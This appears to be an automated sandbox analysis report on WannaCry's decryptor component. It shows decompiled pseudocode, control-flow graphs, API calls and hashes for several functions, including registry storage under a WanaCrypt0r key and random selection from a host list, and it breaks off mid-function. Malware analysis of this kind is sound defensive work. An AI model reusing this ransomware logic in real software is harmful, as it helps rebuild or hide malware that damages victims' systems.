                                                      • Opcode ID: f4b882eb859de0a193a05a3978ec51d1331cae20c00cf70a3d190a6334ff0923
                                                      • Instruction ID: 0d28d22553b71fc94a0ee6c66579bb390b9294cd647fac9b7e1ecc0347327b15
                                                      • Opcode Fuzzy Hash: f4b882eb859de0a193a05a3978ec51d1331cae20c00cf70a3d190a6334ff0923
                                                      • Instruction Fuzzy Hash: 32218E711806017FE22AE365CD82FFFA26CEF85B04F00452EB369951C1BBE8365B5665
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406DC0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 103windowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 353 406dc0-406dfa SendMessageA #823 354 406e00-406e08 353->354 355 406edf-406ee6 353->355 356 406e0a-406e0c 354->356 357 406e0e 354->357 358 406e11-406e29 SendMessageA 356->358 357->358 359 406ed2-406edc #825 358->359 360 406e2f-406e49 _strnicmp 358->360 359->355 361 406e67-406e6c 360->361 362 406e4b-406e65 _strnicmp 360->362 363 406ec9-406ecc 361->363 364 406e6e 361->364 362->361 362->363 363->359 363->360 365 406e72-406e76 364->365 366 406e78-406e7b 365->366 367 406e7f-406e85 365->367 366->365 368 406e7d 366->368 367->363 369 406e87-406ec4 SendMessageA #6136 367->369 368->363 369->363
                                                      C-Code - Quality: 64%
                                                      			E00406DC0(void* __ecx) {
				int _v76;
				int _v80;
				char _v84;
				int _v88;
				long _v92;
				void* _v96;
				int _v100;
				void* _v104;
				long _t28;
				void* _t29;
				struct HWND__* _t30;
				int _t32;
				void* _t35;
				int _t39;
				long _t47;
				int _t48;
				void* _t51;

				_t35 = __ecx;
				_t48 = 0;
				_t28 = SendMessageA( *(__ecx + 0x4e0), 0xe, 0, 0);
				_t47 = _t28;
				_v96 = 0;
				_v92 = _t47;
				_t4 = _t47 + 1; // 0x1
				L00412CEC();
				_t51 =  &_v104 + 4;
				_v88 = _t28;
				if(_t28 == 0) {
					return _t28;
				}
				_t29 = _t35 + 0x4c0;
				if(_t29 != 0) {
					_t30 =  *(_t29 + 0x20);
				} else {
					_t30 = 0;
				}
				SendMessageA(_t30, 0x44b, _t48,  &_v96); // executed
				_t32 = _v88;
				 *((char*)(_t32 + _t47)) = 0;
				if(_t47 < 0) {
					L15:
					_push(_v88);
					L00412C98();
					return _t32;
				} else {
					do {
						__imp___strnicmp(_t48 + _v88, "<http://", 8);
						_t51 = _t51 + 0xc;
						if(_t32 == 0) {
							L7:
							_t48 = _t48 + 1;
							_t39 = _t48;
							if(_t48 > _t47) {
								goto L14;
							}
							_t32 = _v88;
							while( *((char*)(_t48 + _t32)) != 0x3e) {
								_t48 = _t48 + 1;
								if(_t48 <= _t47) {
									continue;
								}
								goto L14;
							}
							_t32 = _t48;
							_t48 = _t48 + 1;
							if(_t32 != 0xffffffff) {
								_v100 = _t32;
								_v104 = _t39;
								SendMessageA( *(_t35 + 0x4e0), 0x437, 0,  &_v104);
								_t32 = 0x20;
								_push( &_v84);
								_v84 = 0x54;
								_v76 = 0x20;
								_v80 = 0x20;
								L00412F4A();
							}
							goto L14;
						}
						_t32 = _v88;
						__imp___strnicmp(_t48 + _t32, "<https://", 9);
						_t51 = _t51 + 0xc;
						if(_t32 != 0) {
							goto L14;
						}
						goto L7;
						L14:
						_t48 = _t48 + 1;
					} while (_t48 <= _t47);
					goto L15;
				}
			}




















                                                      0x00406dcc
                                                      0x00406dce
                                                      0x00406ddc
                                                      0x00406dde
                                                      0x00406de0
                                                      0x00406de4
                                                      0x00406de8
                                                      0x00406dec
                                                      0x00406df1
                                                      0x00406df6
                                                      0x00406dfa
                                                      0x00406ee6
                                                      0x00406ee6
                                                      0x00406e00
                                                      0x00406e08
                                                      0x00406e0e
                                                      0x00406e0a
                                                      0x00406e0a
                                                      0x00406e0a
                                                      0x00406e1d
                                                      0x00406e1f
                                                      0x00406e25
                                                      0x00406e29
                                                      0x00406ed2
                                                      0x00406ed6
                                                      0x00406ed7
                                                      0x00000000
                                                      0x00406e2f
                                                      0x00406e2f
                                                      0x00406e3e
                                                      0x00406e44
                                                      0x00406e49
                                                      0x00406e67
                                                      0x00406e67
                                                      0x00406e6a
                                                      0x00406e6c
                                                      0x00000000
                                                      0x00000000
                                                      0x00406e6e
                                                      0x00406e72
                                                      0x00406e78
                                                      0x00406e7b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00406e7d
                                                      0x00406e7f
                                                      0x00406e81
                                                      0x00406e85
                                                      0x00406e8b
                                                      0x00406e9e
                                                      0x00406ea2
                                                      0x00406ea8
                                                      0x00406ead
                                                      0x00406eb4
                                                      0x00406ebc
                                                      0x00406ec0
                                                      0x00406ec4
                                                      0x00406ec4
                                                      0x00000000
                                                      0x00406e85
                                                      0x00406e4b
                                                      0x00406e5a
                                                      0x00406e60
                                                      0x00406e65
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00406ec9
                                                      0x00406ec9
                                                      0x00406eca
                                                      0x00000000
                                                      0x00406e2f

                                                      APIs
                                                      • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 00406DDC
                                                      • #823.MFC42(00000001,?,?), ref: 00406DEC
                                                      • SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406E1D
                                                      • _strnicmp.MSVCRT ref: 00406E3E
                                                      • _strnicmp.MSVCRT ref: 00406E5A
                                                      • SendMessageA.USER32(?,00000437,00000000,?), ref: 00406EA2
                                                      • #6136.MFC42 ref: 00406EC4
                                                      • #825.MFC42(?), ref: 00406ED7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$_strnicmp$#6136#823#825
                                                      • String ID: <http://$<https://$T
                                                      • API String ID: 1228111698-1216084165
                                                      • Opcode ID: cdce9b46107efdddb91857a97f1fff2144e6341c78577d605c9c0136cf899573
                                                      • Instruction ID: 32e461136b03d60599108953de6477053a568cccd29e118696d71e5d9ed076ef
                                                      • Opcode Fuzzy Hash: cdce9b46107efdddb91857a97f1fff2144e6341c78577d605c9c0136cf899573
                                                      • Instruction Fuzzy Hash: 7E31D6B52043509BD320CF18CC41FABB7E4BB98704F044A3EF98AD7281E678D95987D9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401C70 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 114registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 370 401c70-401cd8 wcscat 371 401cdc-401cde 370->371 372 401ce0-401cef 371->372 373 401cf1-401cfb 371->373 374 401d00-401d0c RegCreateKeyW 372->374 373->374 375 401d12-401d1b 374->375 376 401dad-401db5 374->376 377 401d62-401d8e RegQueryValueExA 375->377 378 401d1d-401d60 GetCurrentDirectoryA RegSetValueExA 375->378 376->371 379 401dbb-401dc7 376->379 380 401d9e-401dab RegCloseKey 377->380 381 401d90-401d98 SetCurrentDirectoryA 377->381 378->380 380->376 382 401dc8-401dd7 380->382 381->380
                                                      C-Code - Quality: 84%
                                                      			E00401C70(signed int _a4) {
				void _v519;
				char _v520;
				void _v700;
				short _v720;
				int _v724;
				void* _v728;
				int _t30;
				void* _t36;
				signed int _t38;
				signed int _t46;
				signed int _t56;
				int _t72;
				void* _t77;

				_t30 = memset( &_v700, memcpy( &_v720, L"Software\\", 5 << 2), 0x2d << 2);
				_v520 = _t30;
				memset( &_v519, _t30, 0x81 << 2);
				asm("stosw");
				asm("stosb");
				_v728 = 0;
				wcscat( &_v720, L"WanaCrypt0r");
				_t72 = 0;
				_v724 = 0;
				do {
					if(_t72 != 0) {
						RegCreateKeyW(0x80000001,  &_v720,  &_v728);
					} else {
						RegCreateKeyW(0x80000002,  &_v720,  &_v728);
					}
					_t36 = _v728;
					if(_t36 == 0) {
						goto L10;
					} else {
						_t56 = _a4;
						if(_t56 == 0) {
							_v724 = 0x207;
							_t38 = RegQueryValueExA(_t36, "wd", 0, 0,  &_v520,  &_v724); // executed
							asm("sbb esi, esi");
							_t77 =  ~_t38 + 1;
							if(_t77 != 0) {
								SetCurrentDirectoryA( &_v520);
							}
						} else {
							GetCurrentDirectoryA(0x207,  &_v520);
							asm("repne scasb");
							_t46 = RegSetValueExA(_v728, "wd", 0, 1,  &_v520,  !(_t56 | 0xffffffff));
							_t72 = _v724;
							asm("sbb esi, esi");
							_t77 =  ~_t46 + 1;
						}
						RegCloseKey(_v728); // executed
						if(_t77 != 0) {
							return 1;
						} else {
							goto L10;
						}
					}
					L13:
					L10:
					_t72 = _t72 + 1;
					_v724 = _t72;
				} while (_t72 < 2);
				return 0;
				goto L13;
			}
















                                                      0x00401c95
                                                      0x00401ca3
                                                      0x00401caf
                                                      0x00401cb1
                                                      0x00401cb3
                                                      0x00401cb8
                                                      0x00401cc1
                                                      0x00401cd6
                                                      0x00401cd8
                                                      0x00401cdc
                                                      0x00401cde
                                                      0x00401d00
                                                      0x00401ce0
                                                      0x00401d00
                                                      0x00401d00
                                                      0x00401d06
                                                      0x00401d0c
                                                      0x00000000
                                                      0x00401d12
                                                      0x00401d12
                                                      0x00401d1b
                                                      0x00401d79
                                                      0x00401d81
                                                      0x00401d8b
                                                      0x00401d8d
                                                      0x00401d8e
                                                      0x00401d98
                                                      0x00401d98
                                                      0x00401d1d
                                                      0x00401d2a
                                                      0x00401d38
                                                      0x00401d53
                                                      0x00401d55
                                                      0x00401d5d
                                                      0x00401d5f
                                                      0x00401d5f
                                                      0x00401da3
                                                      0x00401dab
                                                      0x00401dd7
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00401dab
                                                      0x00000000
                                                      0x00401dad
                                                      0x00401dad
                                                      0x00401db1
                                                      0x00401db1
                                                      0x00401dc7
                                                      0x00000000

                                                      APIs
                                                      • wcscat.MSVCRT ref: 00401CC1
                                                      • RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
                                                      • GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
                                                      • RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
                                                      • RegQueryValueExA.KERNELBASE ref: 00401D81
                                                      • SetCurrentDirectoryA.KERNEL32(?), ref: 00401D98
                                                      • RegCloseKey.KERNELBASE(00000000), ref: 00401DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CurrentDirectoryValue$CloseCreateQuerywcscat
                                                      • String ID: Software\$WanaCrypt0r
                                                      • API String ID: 3883271862-1723423467
                                                      • Opcode ID: 105d7a24118395946ed673951bb32e2166cb0bb2b49e0db688a6da733a97e5a2
                                                      • Instruction ID: c02b3dbe7123360802e3a7ceba079e11f57c538643229ddb10ed726050e42e59
                                                      • Opcode Fuzzy Hash: 105d7a24118395946ed673951bb32e2166cb0bb2b49e0db688a6da733a97e5a2
                                                      • Instruction Fuzzy Hash: 5F31C271208341ABD320CF54DC44BEBB7A8FFC4750F404D2EF996A7290D7B4A90987A6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040BAF0 Relevance: 15.3, APIs: 10, Instructions: 301stringsleepCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 86%
                                                      			E0040BAF0() {
				signed int _t71;
				signed int _t72;
				void* _t84;
				signed int _t86;
				signed int _t91;
				signed int _t92;
				signed int _t97;
				intOrPtr _t101;
				signed int _t110;
				void* _t113;
				void* _t116;
				signed int _t126;
				char _t129;
				signed int _t131;
				unsigned int _t138;
				signed int _t139;
				char* _t144;
				signed int _t147;
				unsigned int _t152;
				signed int _t153;
				signed int _t158;
				signed int _t160;
				signed int _t161;
				signed int _t169;
				signed int _t172;
				signed int _t173;
				signed int _t181;
				signed int _t191;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				void* _t237;
				char* _t238;
				void* _t240;
				void* _t241;
				intOrPtr* _t242;
				void* _t245;
				intOrPtr* _t246;
				signed int _t249;
				intOrPtr* _t250;
				intOrPtr _t251;
				void* _t252;
				void* _t255;
				void* _t256;
				void* _t257;
				void* _t259;
				void* _t260;
				void* _t262;
				void* _t263;
				void* _t264;

				_push(0xffffffff);
				_push(E00414286);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t251;
				_t252 = _t251 - 0x47c;
				_t71 = E0040BA10();
				if(_t71 != 0) {
					L31:
					_t72 = _t71 | 0xffffffff;
					__eflags = _t72;
				} else {
					_t131 =  *0x422210; // 0xb828e8
					 *((intOrPtr*)( *_t131 + 0xc))();
					asm("repne scasb");
					_t266 =  !(_t131 | 0xffffffff) == 1;
					if( !(_t131 | 0xffffffff) == 1) {
						L3:
						_t249 = 0;
						 *((char*)(_t252 + 0x14)) =  *((intOrPtr*)(_t252 + 0x13));
						 *((intOrPtr*)(_t252 + 0x18)) = E0040C8F0(0, 0, 0);
						 *(_t252 + 0x1c) = 0;
						asm("repne scasb");
						_t138 =  !(_t252 + 0x0000001c | 0xffffffff);
						_t237 =  *((intOrPtr*)(_t252 + 0x49c)) - _t138;
						 *((intOrPtr*)(_t252 + 0x498)) = 0;
						_t139 = _t138 >> 2;
						memcpy(_t237 + _t139 + _t139, _t237, memcpy(_t252 + 0xa4, _t237, _t139 << 2) & 0x00000003);
						_t255 = _t252 + 0x18;
						_t144 = _t255 + 0xa8;
						_t238 = strtok(_t144, ",;");
						_t256 = _t255 + 8;
						if(_t238 != 0) {
							_t129 =  *((intOrPtr*)(_t256 + 0x13));
							do {
								_t200 = _t249;
								_t249 = _t249 + 1;
								if(_t200 > 0) {
									_t181 = _t256 + 0x28;
									 *(_t256 + 0x28) = _t129;
									E0040C7B0(_t181, 0);
									asm("repne scasb");
									_push( !(_t181 | 0xffffffff) - 1);
									_push(_t238);
									E0040C920(_t256 + 0x2c);
									 *((char*)(_t256 + 0x4a0)) = 1;
									E0040C800(_t256 + 0x24, _t256 + 0x20, _t256 + 0x24,  *((intOrPtr*)(_t256 + 0x18)), _t256 + 0x24);
									_t144 = _t256 + 0x28;
									 *((char*)(_t256 + 0x498)) = 0;
									E0040C7B0(_t144, 1);
								}
								_t238 = strtok(0, ",;");
								_t256 = _t256 + 8;
							} while (_t238 != 0);
						}
						asm("repne scasb");
						_t147 =  !(_t144 | 0xffffffff) - 1;
						if(_t147 == 0) {
							L17:
							_push(_t256 + 0xa4);
							_t84 = E0040BA60(_t277);
							_t256 = _t256 + 4;
							if(_t84 != 0) {
								goto L19;
							} else {
								asm("repne scasb");
								_t172 =  !(_t147 | 0xffffffff);
								_t245 = _t256 + 0xa4 - _t172;
								_t173 = _t172 >> 2;
								memcpy(0x422214, _t245, _t173 << 2);
								_t263 = _t256 + 0xc;
								 *((intOrPtr*)(_t263 + 0x498)) = 0xffffffff;
								_t113 = memcpy(_t245 + _t173 + _t173, _t245, _t172 & 0x00000003);
								_t264 = _t263 + 0xc;
								E0040C860(_t264 + 0x20, _t264 + 0x24,  *_t113,  *((intOrPtr*)(_t256 + 0x18)));
								_push( *((intOrPtr*)(_t264 + 0x18)));
								L00412C98();
								_t252 = _t264 + 4;
								_t72 = 0;
							}
						} else {
							_t246 = _t256 + 0xa4;
							_t116 = 0x422214;
							while(1) {
								_t198 =  *_t116;
								_t147 = _t198;
								if(_t198 !=  *_t246) {
									break;
								}
								if(_t147 == 0) {
									L14:
									_t116 = 0;
								} else {
									_t24 = _t116 + 1; // 0x0
									_t199 =  *_t24;
									_t147 = _t199;
									if(_t199 !=  *((intOrPtr*)(_t246 + 1))) {
										break;
									} else {
										_t116 = _t116 + 2;
										_t246 = _t246 + 2;
										if(_t147 != 0) {
											continue;
										} else {
											goto L14;
										}
									}
								}
								L16:
								_t277 = _t116;
								if(_t116 == 0) {
									L19:
									srand(GetTickCount());
									_t86 =  *(_t256 + 0x20);
									_t257 = _t256 + 4;
									__eflags = _t86;
									if(_t86 <= 0) {
										L30:
										 *((intOrPtr*)(_t257 + 0x494)) = 0xffffffff;
										_t71 = E0040C860(_t257 + 0x20, _t257 + 0x3c,  *((intOrPtr*)( *((intOrPtr*)(_t257 + 0x18)))),  *((intOrPtr*)(_t257 + 0x18)));
										_push( *((intOrPtr*)(_t257 + 0x18)));
										L00412C98();
										_t252 = _t257 + 4;
										goto L31;
									} else {
										do {
											_t191 = rand() % _t86;
											_t250 =  *((intOrPtr*)( *((intOrPtr*)(_t257 + 0x18))));
											__eflags = _t191;
											_t91 = _t191;
											if(_t191 > 0) {
												_t91 = 0;
												__eflags = 0;
												do {
													_t250 =  *_t250;
													_t191 = _t191 - 1;
													__eflags = _t191;
												} while (_t191 != 0);
											}
											__eflags = _t91;
											if(_t91 < 0) {
												_t110 =  ~_t91;
												do {
													_t250 =  *((intOrPtr*)(_t250 + 4));
													_t110 = _t110 - 1;
													__eflags = _t110;
												} while (_t110 != 0);
											}
											_t92 =  *(_t250 + 0xc);
											_t42 = _t250 + 8; // 0x8
											_t126 = _t42;
											__eflags = _t92;
											if(__eflags == 0) {
												_t92 = 0x41ba38;
											}
											asm("repne scasb");
											_t152 =  !(_t147 | 0xffffffff);
											_t240 = _t92 - _t152;
											_t153 = _t152 >> 2;
											memcpy(_t240 + _t153 + _t153, _t240, memcpy(_t257 + 0x40, _t240, _t153 << 2) & 0x00000003);
											_t259 = _t257 + 0x18;
											_t158 = _t259 + 0x40;
											_push(_t158);
											_t97 = E0040BA60(__eflags);
											_t260 = _t259 + 4;
											__eflags = _t97;
											if(_t97 == 0) {
												 *((intOrPtr*)(_t260 + 0x494)) = 0xffffffff;
												asm("repne scasb");
												_t160 =  !(_t158 | 0xffffffff);
												_t241 = _t260 + 0x40 - _t160;
												_t161 = _t160 >> 2;
												memcpy(0x422214, _t241, _t161 << 2);
												memcpy(_t241 + _t161 + _t161, _t241, _t160 & 0x00000003);
												_t262 = _t260 + 0x18;
												_t242 =  *((intOrPtr*)(_t262 + 0x18));
												_t101 =  *_t242;
												__eflags = _t101 - _t242;
												 *((intOrPtr*)(_t262 + 0x20)) = _t101;
												if(_t101 != _t242) {
													do {
														_push(0);
														E0040C740(_t262 + 0x1c, _t262 + 0x3c,  *((intOrPtr*)(E00402D90(_t262 + 0x28, _t262 + 0x38))));
														__eflags =  *((intOrPtr*)(_t262 + 0x20)) - _t242;
													} while ( *((intOrPtr*)(_t262 + 0x20)) != _t242);
												}
												_push( *((intOrPtr*)(_t262 + 0x18)));
												L00412C98();
												_t252 = _t262 + 4;
												_t72 = 0;
											} else {
												goto L29;
											}
											goto L32;
											L29:
											_t169 =  *0x422210; // 0xb828e8
											 *((intOrPtr*)( *_t169 + 0xc))();
											 *((intOrPtr*)( *((intOrPtr*)(_t250 + 4)))) =  *_t250;
											_t147 = _t126;
											 *((intOrPtr*)( *_t250 + 4)) =  *((intOrPtr*)(_t250 + 4));
											E0040CE50(_t147, 0);
											_push(_t250);
											L00412C98();
											_t257 = _t260 + 4;
											 *((intOrPtr*)(_t257 + 0x20)) =  *((intOrPtr*)(_t260 + 0x20)) - 1;
											Sleep(0xbb8); // executed
											_t86 =  *(_t257 + 0x1c);
											__eflags = _t86;
										} while (_t86 > 0);
										goto L30;
									}
								} else {
									goto L17;
								}
								goto L32;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							goto L16;
						}
					} else {
						_push(0x422214);
						_t72 = E0040BA60(_t266);
						_t252 = _t252 + 4;
						if(_t72 != 0) {
							goto L3;
						}
					}
				}
				L32:
				 *[fs:0x0] =  *((intOrPtr*)(_t252 + 0x48c));
				return _t72;
			}





















































                                                      0x0040baf6
                                                      0x0040baf8
                                                      0x0040bafd
                                                      0x0040bafe
                                                      0x0040bb05
                                                      0x0040bb0f
                                                      0x0040bb16
                                                      0x0040bdf5
                                                      0x0040bdf5
                                                      0x0040bdf5
                                                      0x0040bb1c
                                                      0x0040bb1c
                                                      0x0040bb24
                                                      0x0040bb31
                                                      0x0040bb35
                                                      0x0040bb36
                                                      0x0040bb4d
                                                      0x0040bb51
                                                      0x0040bb53
                                                      0x0040bb62
                                                      0x0040bb66
                                                      0x0040bb7d
                                                      0x0040bb7f
                                                      0x0040bb8a
                                                      0x0040bb8e
                                                      0x0040bb95
                                                      0x0040bb9f
                                                      0x0040bb9f
                                                      0x0040bba1
                                                      0x0040bbae
                                                      0x0040bbb0
                                                      0x0040bbb5
                                                      0x0040bbb7
                                                      0x0040bbbb
                                                      0x0040bbbb
                                                      0x0040bbbd
                                                      0x0040bbc0
                                                      0x0040bbc4
                                                      0x0040bbc8
                                                      0x0040bbcc
                                                      0x0040bbd8
                                                      0x0040bbdd
                                                      0x0040bbde
                                                      0x0040bbe3
                                                      0x0040bbfb
                                                      0x0040bc03
                                                      0x0040bc0a
                                                      0x0040bc0e
                                                      0x0040bc16
                                                      0x0040bc16
                                                      0x0040bc27
                                                      0x0040bc29
                                                      0x0040bc2c
                                                      0x0040bbbb
                                                      0x0040bc3a
                                                      0x0040bc3e
                                                      0x0040bc3f
                                                      0x0040bc7e
                                                      0x0040bc85
                                                      0x0040bc86
                                                      0x0040bc8b
                                                      0x0040bc90
                                                      0x00000000
                                                      0x0040bc92
                                                      0x0040bc9c
                                                      0x0040bc9e
                                                      0x0040bca8
                                                      0x0040bcb0
                                                      0x0040bcb3
                                                      0x0040bcb3
                                                      0x0040bcb7
                                                      0x0040bcc5
                                                      0x0040bcc5
                                                      0x0040bcd3
                                                      0x0040bcdc
                                                      0x0040bcdd
                                                      0x0040bce2
                                                      0x0040bce5
                                                      0x0040bce5
                                                      0x0040bc41
                                                      0x0040bc41
                                                      0x0040bc48
                                                      0x0040bc4d
                                                      0x0040bc4d
                                                      0x0040bc51
                                                      0x0040bc55
                                                      0x00000000
                                                      0x00000000
                                                      0x0040bc59
                                                      0x0040bc71
                                                      0x0040bc71
                                                      0x0040bc5b
                                                      0x0040bc5b
                                                      0x0040bc5b
                                                      0x0040bc61
                                                      0x0040bc65
                                                      0x00000000
                                                      0x0040bc67
                                                      0x0040bc67
                                                      0x0040bc6a
                                                      0x0040bc6f
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040bc6f
                                                      0x0040bc65
                                                      0x0040bc7a
                                                      0x0040bc7a
                                                      0x0040bc7c
                                                      0x0040bcec
                                                      0x0040bcf3
                                                      0x0040bcf8
                                                      0x0040bcfc
                                                      0x0040bcff
                                                      0x0040bd01
                                                      0x0040bdc7
                                                      0x0040bdcb
                                                      0x0040bde3
                                                      0x0040bdec
                                                      0x0040bded
                                                      0x0040bdf2
                                                      0x00000000
                                                      0x0040bd07
                                                      0x0040bd07
                                                      0x0040bd10
                                                      0x0040bd16
                                                      0x0040bd18
                                                      0x0040bd1a
                                                      0x0040bd1c
                                                      0x0040bd1e
                                                      0x0040bd1e
                                                      0x0040bd20
                                                      0x0040bd20
                                                      0x0040bd23
                                                      0x0040bd23
                                                      0x0040bd23
                                                      0x0040bd20
                                                      0x0040bd26
                                                      0x0040bd28
                                                      0x0040bd2a
                                                      0x0040bd2c
                                                      0x0040bd2c
                                                      0x0040bd2f
                                                      0x0040bd2f
                                                      0x0040bd2f
                                                      0x0040bd2c
                                                      0x0040bd32
                                                      0x0040bd35
                                                      0x0040bd35
                                                      0x0040bd38
                                                      0x0040bd3a
                                                      0x0040bd3c
                                                      0x0040bd3c
                                                      0x0040bd4c
                                                      0x0040bd4e
                                                      0x0040bd54
                                                      0x0040bd58
                                                      0x0040bd62
                                                      0x0040bd62
                                                      0x0040bd64
                                                      0x0040bd68
                                                      0x0040bd69
                                                      0x0040bd6e
                                                      0x0040bd71
                                                      0x0040bd73
                                                      0x0040be1a
                                                      0x0040be25
                                                      0x0040be27
                                                      0x0040be2d
                                                      0x0040be34
                                                      0x0040be37
                                                      0x0040be3e
                                                      0x0040be3e
                                                      0x0040be40
                                                      0x0040be44
                                                      0x0040be46
                                                      0x0040be48
                                                      0x0040be4c
                                                      0x0040be4e
                                                      0x0040be52
                                                      0x0040be6a
                                                      0x0040be6f
                                                      0x0040be6f
                                                      0x0040be4e
                                                      0x0040be79
                                                      0x0040be7a
                                                      0x0040be7f
                                                      0x0040be82
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040bd79
                                                      0x0040bd79
                                                      0x0040bd81
                                                      0x0040bd8c
                                                      0x0040bd94
                                                      0x0040bd96
                                                      0x0040bd99
                                                      0x0040bd9e
                                                      0x0040bd9f
                                                      0x0040bda8
                                                      0x0040bdb1
                                                      0x0040bdb5
                                                      0x0040bdbb
                                                      0x0040bdbf
                                                      0x0040bdbf
                                                      0x00000000
                                                      0x0040bd07
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040bc7c
                                                      0x0040bc75
                                                      0x0040bc77
                                                      0x00000000
                                                      0x0040bc77
                                                      0x0040bb38
                                                      0x0040bb38
                                                      0x0040bb3d
                                                      0x0040bb42
                                                      0x0040bb47
                                                      0x00000000
                                                      0x00000000
                                                      0x0040bb47
                                                      0x0040bb36
                                                      0x0040bdf8
                                                      0x0040be03
                                                      0x0040be10

                                                      APIs
                                                      • strtok.MSVCRT ref: 0040BBA9
                                                      • strtok.MSVCRT ref: 0040BC22
                                                      • #825.MFC42(?,?), ref: 0040BCDD
                                                      • GetTickCount.KERNEL32 ref: 0040BCEC
                                                      • srand.MSVCRT ref: 0040BCF3
                                                      • rand.MSVCRT ref: 0040BD09
                                                      • #825.MFC42(00000000,00000000,?,?,?,00000000,00000000), ref: 0040BD9F
                                                      • Sleep.KERNELBASE(00000BB8,00000000,?,?,?,00000000,00000000), ref: 0040BDB5
                                                      • #825.MFC42(?,?,?,?), ref: 0040BDED
                                                        • Part of subcall function 0040C860: #825.MFC42(?,00000000,0019FA30,00422214,00000000,0040BDE8,?,?,?), ref: 0040C8B5
                                                      • #825.MFC42(?), ref: 0040BE7A
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #825$strtok$CountSleepTickrandsrand
                                                      • String ID:
                                                      • API String ID: 1749417438-0
                                                      • Opcode ID: 96e699f875d8ec980aa85d24ffdf4feb71e75c823abe6f95846dbf914e7e69aa
                                                      • Instruction ID: 15ce6157e9eadcb8372a8ba3d428bceb52ebc69e02ab62c17c692bc1e2f98a80
                                                      • Opcode Fuzzy Hash: 96e699f875d8ec980aa85d24ffdf4feb71e75c823abe6f95846dbf914e7e69aa
                                                      • Instruction Fuzzy Hash: 48A102716082059BC724DF34C841AABB7D4EF95314F044A3EF99AA73D1EB78D908C79A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004085C0 Relevance: 13.6, APIs: 9, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 83%
                                                      			E004085C0(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v16;
				long _v20;
				void _v24;
				intOrPtr _v28;
				int _t33;
				intOrPtr _t50;
				long _t53;
				intOrPtr _t55;

				_push(0xffffffff);
				_push(E00413FF3);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t55;
				_t50 = __ecx;
				_v16 = __ecx;
				L00412C8C();
				 *((intOrPtr*)(__ecx)) = 0x4157f0;
				_v4 = 0;
				L00412F74();
				 *((intOrPtr*)(__ecx + 0x74)) = 0;
